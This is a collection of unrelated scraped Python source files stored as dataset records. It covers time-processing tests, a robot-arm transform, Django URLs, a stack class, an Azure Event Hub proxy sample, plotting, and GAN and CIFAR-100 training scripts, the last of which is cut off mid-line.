0, 0), \"Saturday\"),\n (2020, True, EsoTimestamp(1, 1, 0, 0), \"Wednesday\"),\n (2002, False, EsoTimestamp(10, 28, 0, 0), \"Monday\"),\n (2002, False, EsoTimestamp(2, 28, 0, 0), \"Thursday\"),\n (2002, False, EsoTimestamp(1, 1, 0, 0), \"Tuesday\"),\n ],\n)\ndef test_validate_year(year, is_leap, date, day):\n assert validate_year(year, is_leap, date, day) is None\n\n\n@pytest.mark.parametrize(\n \"year, is_leap, date, day, error\",\n [\n (2019, True, EsoTimestamp(10, 28, 0, 0), \"Wednesday\", LeapYearMismatch),\n (2001, True, None, None, LeapYearMismatch),\n (2002, False, EsoTimestamp(10, 28, 0, 0), \"Tuesday\", StartDayMismatch),\n (2020, True, EsoTimestamp(1, 1, 0, 0), \"Friday\", StartDayMismatch),\n ],\n)\ndef test_validate_year_incorrect(year, is_leap, date, day, error):\n with pytest.raises(error):\n validate_year(year, is_leap, date, day)\n\n\n@pytest.mark.parametrize(\n \"dates, expected\",\n [\n (\n [\n EsoTimestamp(2, 28, 0, 0),\n EsoTimestamp(2, 29, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n ],\n True,\n ),\n (\n [\n EsoTimestamp(2, 27, 0, 0),\n EsoTimestamp(2, 28, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n ],\n False,\n ),\n (\n [\n EsoTimestamp(2, 27, 0, 0),\n EsoTimestamp(2, 28, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n EsoTimestamp(2, 27, 0, 0),\n ],\n False,\n ),\n ],\n)\ndef test_is_leap_year_ts_to_d(dates, expected):\n assert is_leap_year_ts_to_d(dates) is expected\n\n\n@pytest.mark.parametrize(\n \"is_leap, date, day, max_year, expected\",\n [\n (True, EsoTimestamp(2, 1, 0, 0), \"Sunday\", 2020, 2004),\n (True, EsoTimestamp(2, 2, 0, 0), \"Monday\", 2020, 2004),\n (True, EsoTimestamp(2, 3, 0, 0), \"Tuesday\", 2020, 2004),\n (True, EsoTimestamp(2, 4, 0, 0), \"Wednesday\", 2020, 2004),\n (True, EsoTimestamp(2, 5, 0, 0), \"Thursday\", 2020, 2004),\n (True, EsoTimestamp(2, 6, 0, 0), \"Friday\", 2020, 2004),\n (True, EsoTimestamp(2, 7, 0, 0), \"Saturday\", 2020, 2004),\n (False, EsoTimestamp(2, 1, 0, 0), \"Sunday\", 2020, 2015),\n (False, EsoTimestamp(2, 2, 0, 0), \"Monday\", 2020, 2015),\n (False, EsoTimestamp(2, 3, 0, 0), \"Tuesday\", 2020, 2015),\n (False, EsoTimestamp(2, 4, 0, 0), \"Wednesday\", 2020, 2015),\n (False, EsoTimestamp(2, 5, 0, 0), \"Thursday\", 2020, 2015),\n (False, EsoTimestamp(2, 6, 0, 0), \"Friday\", 2020, 2015),\n (False, EsoTimestamp(2, 7, 0, 0), \"Saturday\", 2020, 2015),\n ],\n)\ndef test_seek_year(is_leap, date, day, max_year, expected):\n assert seek_year(is_leap, date, day, max_year) == expected\n\n\ndef test_seek_year_cannot_find():\n with pytest.raises(ValueError):\n print(seek_year(True, EsoTimestamp(2, 1, 0, 0), \"Monday\", 10))\n\n\n@pytest.mark.parametrize(\n \"is_leap, date, day, max_year, expected\",\n [\n (True, EsoTimestamp(1, 1, 0, 0), \"Sunday\", 2030, [2012, 1984, 1956]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Monday\", 2030, [2024, 1996, 1968]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Tuesday\", 2030, [2008, 1980, 1952]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Wednesday\", 2030, [2020, 1992, 1964]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Friday\", 2030, [2016, 1988, 1960]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Saturday\", 2030, [2028, 2000, 1972]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Sunday\", 2030, [2023, 2017, 2006]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Monday\", 2030, [2029, 2018, 2007]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Tuesday\", 2030, [2030, 2019, 2013]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Wednesday\", 2030, [2025, 2014, 2003]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Friday\", 2030, [2027, 2021, 2010]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Saturday\", 2030, [2022, 2011, 2005]),\n ],\n)\ndef test_get_allowed_years(is_leap, date, day, max_year, expected):\n assert get_allowed_years(is_leap, date, day, max_year, n_samples=3) == expected\n\n\n@pytest.mark.parametrize(\n \"dates, days, valid_date_day\",\n [\n (\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)],\n [\"Sunday\", \"Monday\"],\n (EsoTimestamp(1, 1, 0, 0), \"Sunday\"),\n ),\n (\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)],\n [\"Holiday\", \"Monday\"],\n (EsoTimestamp(1, 2, 0, 0), \"Monday\"),\n ),\n ([EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)], [\"Holiday\", \"Holiday\"], None),\n (\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)],\n [\"WinterDesignDay\", \"WinterDesignDay\"],\n None,\n ),\n ],\n)\ndef test_valid_date_day(dates, days, valid_date_day):\n assert find_first_valid_day(dates, days) == valid_date_day\n\n\n@pytest.mark.parametrize(\n \"drop_intervals, year, expected_start_end\",\n [\n (\n [],\n None,\n {\n TS: (datetime(2020, 1, 1, 0, 30), datetime(2021, 1, 1, 0)),\n H: (datetime(2020, 1, 1, 1, 0), datetime(2021, 1, 1, 0)),\n D: (datetime(2020, 1, 1), datetime(2020, 12, 31, 0)),\n M: (datetime(2020, 1, 1), datetime(2020, 12, 1, 0)),\n A: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n RP: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n },\n ),\n (\n [TS, H, D],\n None,\n {\n M: (datetime(2002, 1, 1), datetime(2002, 12, 1, 0)),\n A: (datetime(2002, 1, 1), datetime(2002, 1, 1)),\n RP: (datetime(2002, 1, 1), datetime(2002, 1, 1)),\n },\n ),\n (\n [],\n 2020,\n {\n TS: (datetime(2020, 1, 1, 0, 30), datetime(2021, 1, 1, 0)),\n H: (datetime(2020, 1, 1, 1, 0), datetime(2021, 1, 1, 0)),\n D: (datetime(2020, 1, 1), datetime(2020, 12, 31, 0)),\n M: (datetime(2020, 1, 1), datetime(2020, 12, 1, 0)),\n A: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n RP: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n },\n ),\n (\n [TS, H, D],\n 2010,\n {\n M: (datetime(2010, 1, 1), datetime(2010, 12, 1, 0)),\n A: (datetime(2010, 1, 1), datetime(2010, 1, 1)),\n RP: (datetime(2010, 1, 1), datetime(2010, 1, 1)),\n },\n ),\n ],\n)\ndef test_convert_raw_date_data(drop_intervals, year, expected_start_end, test_logger):\n with open(Path(EPLUS_TEST_FILES_PATH, \"leap_year.eso\"), \"r\") as file:\n with test_logger.log_task(\"Test leap year\"):\n all_raw_outputs = read_file(file, test_logger)\n raw_outputs = all_raw_outputs[-1]\n for interval in drop_intervals:\n raw_outputs.remove_interval_data(interval)\n\n dates = convert_raw_date_data(raw_outputs.dates, raw_outputs.days_of_week, year)\n for interval, date_arr in dates.items():\n assert date_arr[0] == expected_start_end[interval][0]\n assert date_arr[-1] == expected_start_end[interval][1]\n","sub_path":"tests/processing/test_time_processing.py","file_name":"test_time_processing.py","file_ext":"py","file_size_in_byte":13387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344927810","text":"import numpy as np\r\n'''\r\nA code for homogeneous transformation of RRP Stanford type manipulator.\r\n'''\r\ndef calculate_transformation(q1,q2,p3,l1=1,l2=1):\r\n # joint 2 and joint 3\r\n H23 = np.array([[1,0,0,l2],\r\n [0,1,0,0 ],\r\n [0,0,1,0],\r\n [0,0,0,1]])\r\n # joint 1 and joint 2\r\n H12 = np.array([[np.cos(q2),-np.sin(q2),0,0], \r\n [0,0,-1,0],\r\n [np.sin(q2),np.cos(q2),0,l1 ],\r\n [0,0,0,1]])\r\n \r\n # Ground frame and joint 1\r\n H01 = np.array([[np.cos(q1),-np.sin(q1),0,0],\r\n [np.sin(q1),np.cos(q1),0,0 ],\r\n [0,0,1,0],\r\n [0,0,0,1]])\r\n \r\n # [p0 = H01*H12*H13*[p3\r\n # 1] 1]\r\n temp = np.matmul(np.matmul(np.matmul(H01,H12),H23),p3)\r\n p0 = temp[:-1]\r\n return p0\r\n\r\n\r\n'''\r\nparams -> q1 - joint angle 1 in radians\r\n q2 - joint angle 2 in radians\r\n p3 - basically [p3,1].T\r\n l1 - length of link 1 \r\n l2 - length of link 2\r\n'''\r\nq1 = 0.1\r\nq2 = 0.2 \r\ndpx = 0.5\r\np3 = [dpx,0,0,1]\r\np0 = calculate_transformation(q1,q2,np.transpose(p3))\r\nprint(p0)\r\n\r\n","sub_path":"Assignment 2/Q8.py","file_name":"Q8.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45632031","text":"\"\"\"yunwei URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom osapp.views import *\nfrom django.conf.urls import patterns\n\nurlpatterns = [\n url(r'^$',index,name='index'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^MyBlog/$', archive),\n url(r'^test/$', test, name='test'),\n url(r'^your-name/$', get_name),\n url(r'^user/$', get_user),\n url(r'^add/$',add , name='add'),\n url(r'^env_add/$',env_add , name='env_add'),\n url(r'^env_list/$',env_list , name='env_list'),\n url(r'^env_html/$',env_html , name='env_html'),\n url(r'^env_del/$',env_del , name='env_del'),\n url(r'^env_edit/$',env_edit,name='env_edit'),\n url(r'^tom_add/$',tom_add,name='tom_add'),\n url(r'^tom_edit/$',tom_edit,name='tom_edit'),\n url(r'^tom_del/$',tom_del,name='tom_del'),\n url(r'^tom_list/$',tom_list,name='tom_list'),\n url(r'^tom_save/$',tom_save,name='tom_save'),\n url(r'^con_list/$',con_list,name='con_list'),\n url(r'^con_del/$',con_del,name='con_del'),\n url(r'^upload_file/$',upload_file,name='upload_file'),\n url(r'^upload_ajax/$',upload_ajax,name='upload_ajax'),\n url(r'^dep_env/$',dep_env,name='dep_env'),\n url(r'^dep_app/$',dep_app,name='dep_app'),\n url(r'^dep_app_to_server/$',dep_app_to_server,name='dep_app_to_server'),\n url(r'^del_con_server/$',del_con_server,name='del_con_server'),\n url(r'^edit_con_srv/$',edit_con_srv,name='edit_con_srv'),\n url(r'^app_save/$',app_save,name=\"app_save\"),\n url(r'^get_dep_srv/$',get_dep_srv,name=\"get_dep_srv\")\n]\n","sub_path":"static/YWZJ/Python/yunwei/yunwei/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445211940","text":"#CPE 202 - Project 1\n#Name: Ajay Patel\n#Section: 1\n#Instructor: S. Einakian\n\n\nclass Node:\n def __init__(self, newval):\n self.value = newval\n self.next = None\n\nclass Stack:\n def __init__(self, capacity):\n self.capacity = capacity\n self.head = None\n self.num_items = 0\n\n\n #To check whether or not the stack is empty \n #None --> True if stack is empty and False if stack is not empty\n def is_empty(self):\n if self.num_item == 0:\n return True\n else:\n return False\n\n #To check whether or not the stack is full\n #None --> True if stack is full and False if stack is not full \n def is_full(self):\n if self.num_items == self.capacity:\n return True\n else:\n return False \n \n #To take an item and add it to the stack \n #item --> None\n def push(self, item):\n if self.num_items == self.capacity:\n raise IndexError('Stack is full')\n else:\n temp = Node(item)\n temp.next = self.head\n self.head = temp\n self.num_items += 1 \n\n\n #To remove an item from the stack if the stack is not empty \n #None --> item \n def pop(self): \n if self.num_items == 0:\n raise IndexError('Stack is empty')\n else:\n temp = self.head.value \n self.head = self.head.next\n self.num_items -= 1\n\n return temp\n\n #To return the last item in the stack without removing it \n #None --> item \n def peek(self):\n if self.num_items == 0:\n raise IndexError('Stack is empty')\n else:\n item = self.head\n\n return item.value\n\n #To get the total number of nodes in the stack\n #None --> int\n def size(self):\n return self.num_items\n","sub_path":"Project5/Project1/stack_linked.py","file_name":"stack_linked.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45140022","text":"from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Syllabus, SyllabusCategory, SyllabusSubCategory\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\nclass Tutorial:\n currentSyllabus = None\n\n def setCurrentSyllabus(syllabus):\n currentSyllabus = Syllabus\n def getSyllabusCategoryAndSubCategory(request):\n syllabusCategories = SyllabusCategory.objects.all()\n syllabusSubCategories = SyllabusSubCategory.objects.all().order_by('index')\n # syllabus = Syllabus.objects.all()\n return render(request,'syllabus.html',{'syllabusCategories':syllabusCategories, 'syllabusSubCategories':syllabusSubCategories})\n\n @login_required(login_url='authentication:login')\n def getContentBySubCategory(request,subCategorySlug = None):\n print(request.user.user_profile)\n if request.user.user_profile.is_subscribed:\n subCategory = SyllabusSubCategory.objects.get(slug = subCategorySlug)\n allContents = Syllabus.objects.filter(sub_category = subCategory)\n print(allContents)\n return render(request,'syllabusContent.html',{'subCategory':subCategory,'allContents':allContents})\n\n @login_required(login_url='authentication:login')\n def getContentByContentSlug(request,subCategorySlug=None, contentSlug=None):\n if not request.user.user_profile.is_subscribed:\n return render(request,'order_details.html',{'course_price':399})\n subCategory = SyllabusSubCategory.objects.get(slug = subCategorySlug)\n allContents = Syllabus.objects.filter(sub_category = subCategory)\n print(allContents[0].syllabus_type_id) \n selectedContent = None\n if contentSlug == '__all__':\n selectedContent = allContents[0]\n else:\n selectedContent = Syllabus.objects.get(slug = contentSlug)\n print(allContents.values())\n file_path = selectedContent.text_content_file\n textFileContent = None\n if file_path is not None and file_path != '':\n \n print('file path is ',file_path)\n f = open(\"static/media/\"+str(file_path), 'r')\n textFileContent = f.read()\n f.close()\n return render(request,'syllabusContent.html',{'subCategory':subCategory,'allContents':allContents, 'selectedContent':selectedContent, 'textFileContent':textFileContent})\n \n","sub_path":"tutorial/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182899881","text":"import os\ndef get_doc_id_list(path, fsave):\n with open(fsave, \"w+\", encoding=\"utf-8\") as f:\n for fname in os.listdir(path):\n f.write(\"{}\\n\".format(fname))\n\nif __name__ == \"__main__\":\n path = \"../data/evaluation/conll2003_ta/query/\"\n fsave = \"../data/evaluation/conll2003_ta/doc_id_list.tsv\"\n get_doc_id_list(path, fsave)","sub_path":"misc/get_doc_id_list.py","file_name":"get_doc_id_list.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"446983772","text":"# -*- coding: utf-8 -*-\nimport mock\nimport pytest\nfrom bravado_core.exception import SwaggerMappingError\n\nfrom bravado_core.marshal import marshal_primitive\n\n\ndef test_integer():\n integer_spec = {\n 'type': 'integer'\n }\n assert 10 == marshal_primitive(integer_spec, 10)\n\n\ndef test_string():\n string_spec = {\n 'type': 'string'\n }\n assert 'foo' == marshal_primitive(string_spec, 'foo')\n assert u'Ümlaut' == marshal_primitive(string_spec, u'Ümlaut')\n\n\n@mock.patch('bravado_core.marshal.formatter.to_wire')\ndef test_uses_default_and_skips_formatting(mock_to_wire):\n integer_spec = {\n 'type': 'integer',\n 'default': 10,\n }\n assert 10 == marshal_primitive(integer_spec, None)\n assert mock_to_wire.call_count == 0\n\n\n@mock.patch('bravado_core.marshal.formatter.to_wire', return_value=99)\ndef test_skips_default(mock_to_wire):\n integer_spec = {\n 'type': 'integer',\n 'default': 10,\n }\n assert 99 == marshal_primitive(integer_spec, 99)\n assert mock_to_wire.call_count == 1\n\n\ndef test_required():\n integer_spec = {\n 'type': 'integer',\n 'required': True,\n }\n assert 99 == marshal_primitive(integer_spec, 99)\n\n\ndef test_required_failure():\n integer_spec = {\n 'type': 'integer',\n 'required': True,\n }\n with pytest.raises(SwaggerMappingError) as excinfo:\n marshal_primitive(integer_spec, None)\n assert 'is a required value' in str(excinfo.value)\n","sub_path":"tests/marshal/marshal_primitive_test.py","file_name":"marshal_primitive_test.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653438127","text":"import yaml\nimport sys\nimport os\n\nimport log\n\nCONFIG_FILE_NAME = \"config.yml\"\n\nclass Config(object):\n def __init__(self, conf_yml_file):\n if (not os.path.exists(conf_yml_file)):\n log.logging.critical('Config file not found!')\n sys.exit(-1)\n with open(conf_yml_file,'r') as stream:\n try:\n data = yaml.load(stream)\n except yaml.YAMLError:\n log.logging.critical('Error in config file!')\n sys.exit(-1)\n\n self.__mysql = data['mysql']\n\n\n def get(self, arg):\n\n if (arg == \"mysql\"):\n return self.__mysql\n\n else:\n log.logging.error('Unknown config request!')\n\ncfg = Config(CONFIG_FILE_NAME)\n","sub_path":"Sensor/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230949420","text":"#!/usr/bin/env python\n\n# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\n\"\"\"\nAn example to show sending and receiving events behind a proxy\n\"\"\"\nimport os\nimport time\nfrom azure.eventhub import EventPosition, EventData, EventHubConsumerClient, EventHubProducerClient\n\nCONNECTION_STR = os.environ[\"EVENT_HUB_CONN_STR\"]\nEVENTHUB_NAME = os.environ['EVENT_HUB_NAME']\n\nEVENT_POSITION = EventPosition(\"-1\")\nPARTITION = \"0\"\nHTTP_PROXY = {\n 'proxy_hostname': '127.0.0.1', # proxy hostname\n 'proxy_port': 3128, # proxy port\n 'username': 'admin', # username used for proxy authentication if needed\n 'password': '123456' # password used for proxy authentication if needed\n}\n\n\ndef on_event(partition_context, event):\n print(\"received event from partition: {}\".format(partition_context.partition_id))\n # do some operations on the event\n print(event)\n\n\nconsumer_client = EventHubConsumerClient.from_connection_string(\n conn_str=CONNECTION_STR, eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)\nproducer_client = EventHubProducerClient.from_connection_string(\n conn_str=CONNECTION_STR, eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)\n\nwith producer_client:\n producer_client.send(EventData(\"A single event\"))\n print('Finish sending.')\n\nwith consumer_client:\n receiving_time = 5\n consumer_client.receive(on_event=on_event, consumer_group='$Default')\n print('Finish receiving.')\n\n","sub_path":"sdk/eventhub/azure-eventhubs/samples/sync_samples/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147100564","text":"import torch\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\nfrom model import WGAN_GP\n\nif __name__ == \"__main__\":\n\n root = 'data/'\n image_size = 32\n batch_size = 128\n nb_epochs = 10\n\n dataset = datasets.MNIST(root,\n transform=transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(), \n transforms.Normalize((0.5,), (0.5,))\n ]),\n download=True)\n\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\n shuffle=True, num_workers=0)\n\n WGANGP_model = WGAN_GP(n_c=1, batch_size=batch_size, model_depth=4)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") \n z = torch.randn((64, 100, 1, 1), device=device)\n result = WGANGP_model(z)\n save_image(result, 'results/noise.png')\n\n for n_epoch in range(nb_epochs):\n WGANGP_model.train_epoch(dataloader)\n WGANGP_model.save_models()\n result = WGANGP_model(z)\n save_image(result, 'results/result_epoch{}.png'.format(n_epoch))\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527132861","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 23/11/2013\n\n@author: ubuntu\n'''\n\n\nclass Persona(object):\n '''\n classdocs\n '''\n\n # Constructor\n def __init__(self, Nombre=None, Apellido=None, Pais=None, \\\n Institucion=None):\n # Chequeo de tipos\n SonNone = type(Nombre) != None and type(Apellido) != None and \\\n type(Pais) != None and type(Institucion) != None\n\n if (type(Nombre) == str) and (type(Apellido) == str) and \\\n (type(Pais) == str) and (type(Institucion) == str) and SonNone:\n\n # Eliminacion de espacios antes y despues de la palabra\n Nombre = Nombre.strip()\n Apellido = Apellido.strip()\n Pais = Pais.strip()\n Institucion = Institucion.strip()\n\n # chequeo de palabra vacia\n Longitud_vacia = (len(Nombre) == 0) or (len(Apellido) == 0) or \\\n (len(Pais) == 0) or (len(Institucion) == 0)\n\n if Longitud_vacia:\n self.__Inicializar_None()\n else:\n self.__Nombre = Nombre\n self.__Apellido = Apellido\n self.__Pais = Pais\n self.__Institucion = Institucion\n\n else:\n self.__Inicializar_None()\n\n # Inicializa en None\n def __Inicializar_None(self):\n self.__Nombre = None\n self.__Apellido = None\n self.__Pais = None\n self.__Institucion = None\n\n # Retorna el nombre de la persona\n def get_nombre(self):\n return self.__Nombre\n\n # Retorna el apellido de la persona\n def get_apellido(self):\n return self.__Apellido\n\n # Retorna el pais de la persona\n def get_pais(self):\n return self.__Pais\n\n # Retorna la institucion de la persona\n def get_institucion(self):\n return self.__Institucion\n\n # Cambia el nombre de la persona\n def set_nombre(self, value):\n if type(value) == str:\n value = value.strip()\n if len(value) != 0:\n self.__Nombre = value\n return True\n return False\n\n # Cambia el apellido de la persona\n def set_apellido(self, value):\n if type(value) == str:\n value = value.strip()\n if len(value) != 0:\n self.__Apellido = value\n return True\n return False\n\n # Cambia el pais de la persona\n def set_pais(self, value):\n if type(value) == str:\n value = value.strip()\n if len(value) != 0:\n self.__Pais = value\n return True\n return False\n\n # Cambia el institucion de la persona\n def set_institucion(self, value):\n if type(value) == str:\n value = value.strip()\n if len(value) != 0:\n self.__Institucion = value\n return True\n return False\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"Persona.py","file_name":"Persona.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309098974","text":"#!/usr/bin/python -tt\n# Another example of hexbin plot\n\nfrom matplotlib import pyplot as PLT\nfrom matplotlib import cm as CM\nfrom matplotlib import mlab as ML\nimport numpy as NP\n\ndef main():\n x = y = NP.linspace(-5, 5, 100)\n X, Y = NP.meshgrid(x, y)\n Z1 = ML.bivariate_normal(X, Y, 2, 2, 0, 0)\n Z2 = ML.bivariate_normal(X, Y, 4, 1, 1, 1)\n ZD = Z2 - Z1\n x = X.ravel()\n y = Y.ravel()\n z = ZD.ravel()\n gridsize=30\n PLT.subplot(111)\n\n PLT.hexbin(x, y, C=z, gridsize=gridsize, cmap=CM.jet, bins=None)\n PLT.axis([x.min(), x.max(), y.min(), y.max()])\n\n cb = PLT.colorbar()\n cb.set_label('mean value')\n PLT.show() \n\nif __name__ == '__main__':\n main()\n","sub_path":"matplotlib-demo/hexbin2.py","file_name":"hexbin2.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534298083","text":"import argparse\n\nimport torch\nfrom torch import nn, optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch.nn.functional as F\nimport numpy as np\nimport random\nimport os\nimport shutil\nimport sys\nimport json\n\nfrom data.augmix_data_manager import get_val_loader, get_train_loader\nfrom data.CIFAR100Dataset import CIFAR100Dataset\nfrom models.resnext import resnext29\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"training script\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--batch_size\", \"-b\", type=int, default=128, help=\"Batch size\")\n parser.add_argument('--pretrained', action='store_true', help='Load pretrain model')\n\n parser.add_argument(\"--learning_rate\", \"-l\", type=float, default=0.1, help=\"Learning rate\")\n parser.add_argument(\"--epochs\", \"-e\", type=int, default=200, help=\"Number of epochs\")\n parser.add_argument(\"--n_workers\", type=int, default=4, help=\"Number of workers for dataloader\")\n parser.add_argument(\"--data_parallel\", action='store_true', help='Run on all visible gpus')\n\n parser.add_argument(\"--shape_loss_weight\", type=float, default=0., help=\"Shape loss weight\")\n parser.add_argument(\"--color_loss_weight\", type=float, default=0., help=\"Color loss weight\")\n parser.add_argument(\"--distance_criterion\", type=str, default='MSE', help=\"MSE or cosine\")\n\n parser.add_argument(\"--img_dir\", default='/home/work/Datasets/CIFAR100/cifar-100', help=\"Images dir path\")\n\n parser.add_argument('--resume', default='', type=str,\n help='path to latest checkpoint (default: none)')\n parser.add_argument(\"--experiment\", default='experiments/CIFAR100/dummy/shape=0_color=0',\n help=\"Logs dir path\")\n parser.add_argument(\"--save_checkpoint_interval\", type=int, default=10, help=\"Save checkpoints every i epochs\")\n\n # AugMix options\n parser.add_argument(\n '--mixture-width',\n default=3,\n type=int,\n help='Number of augmentation chains to mix per augmented example')\n parser.add_argument(\n '--mixture-depth',\n default=-1,\n type=int,\n help='Depth of augmentation chains. -1 denotes stochastic depth in [1, 3]')\n parser.add_argument(\n '--aug-severity',\n default=3,\n type=int,\n help='Severity of base augmentation operators')\n parser.add_argument(\n '--no-jsd',\n '-nj',\n action='store_true',\n help='Turn off JSD consistency loss.')\n parser.add_argument(\n '--all-ops',\n '-all',\n action='store_true',\n help='Turn on all operations (+brightness,contrast,color,sharpness).')\n\n args = parser.parse_args()\n\n args.checkpoint = f'{args.experiment}/checkpoints'\n args.log_dir = f'{args.experiment}/logs'\n\n return args\n\ndef save_checkpoint(state, is_best, checkpoint='checkpoint', filename='checkpoint.pth.tar'):\n if not os.path.exists(checkpoint):\n os.makedirs(checkpoint)\n\n filepath = os.path.join(checkpoint, filename)\n torch.save(state, filepath)\n if is_best:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best.pth.tar'))\n\ndef save_args_json(args):\n args_dict = vars(args)\n\n if not os.path.exists(args.log_dir):\n os.makedirs(args.log_dir)\n\n with open(f'{args.log_dir}/args.json', 'w') as outfile:\n json.dump(args_dict, outfile, indent=4, sort_keys=True)\n\ndef MSE_loss(criterion, pred, target, device='cuda'):\n return criterion(pred, target)\n\ndef get_lr(step, total_steps, lr_max, lr_min):\n \"\"\"Compute learning rate according to cosine annealing schedule.\"\"\"\n return lr_min + (lr_max - lr_min) * 0.5 * (1 +\n np.cos(step / total_steps * np.pi))\n\nclass Trainer:\n def __init__(self, args, device):\n self.args = args\n self.device = device\n self.start_epoch = 0\n self.best_acc = 0\n\n self.use_shape = (self.args.shape_loss_weight > 0)\n self.use_color = (self.args.color_loss_weight > 0)\n\n self.train_loader = get_train_loader(args, CIFAR100Dataset, use_sobel=self.use_shape, use_color=self.use_color)\n self.val_loader = get_val_loader(args, CIFAR100Dataset)\n\n model = resnext29(num_classes=100)\n\n self.optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0.9, weight_decay=5e-4,\n nesterov=True)\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(\n self.optimizer,\n lr_lambda=lambda step: get_lr( # pylint: disable=g-long-lambda\n step,\n args.epochs * len(self.train_loader),\n 1, # lr_lambda computes multiplicative factor\n 1e-6 / args.learning_rate))\n\n if args.resume and os.path.isfile(args.resume):\n print(f'Loading checkpoint {args.resume}')\n\n checkpoint = torch.load(args.resume)\n self.start_epoch = checkpoint['epoch']\n self.best_acc = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n print(f'Loaded checkpoint {args.resume}, starting from epoch {self.start_epoch}')\n\n if args.data_parallel:\n model = torch.nn.DataParallel(model)\n\n self.model = model.to(device)\n\n self.criterion = nn.CrossEntropyLoss()\n self.shape_criterion = nn.MSELoss()\n self.distance_loss_func = MSE_loss\n\n cudnn.benchmark = True\n self.writer = SummaryWriter(log_dir=str(args.log_dir))\n\n def _do_epoch(self, epoch_idx):\n self.model.train()\n\n for batch_idx, (images, targets) in enumerate(self.train_loader):\n self.optimizer.zero_grad()\n\n if self.args.no_jsd:\n images, targets = images.to(self.device), targets.to(self.device)\n logits = self.model(images)\n loss = F.cross_entropy(logits, targets)\n else:\n images_all = torch.cat(images, 0).to(self.device)\n targets = 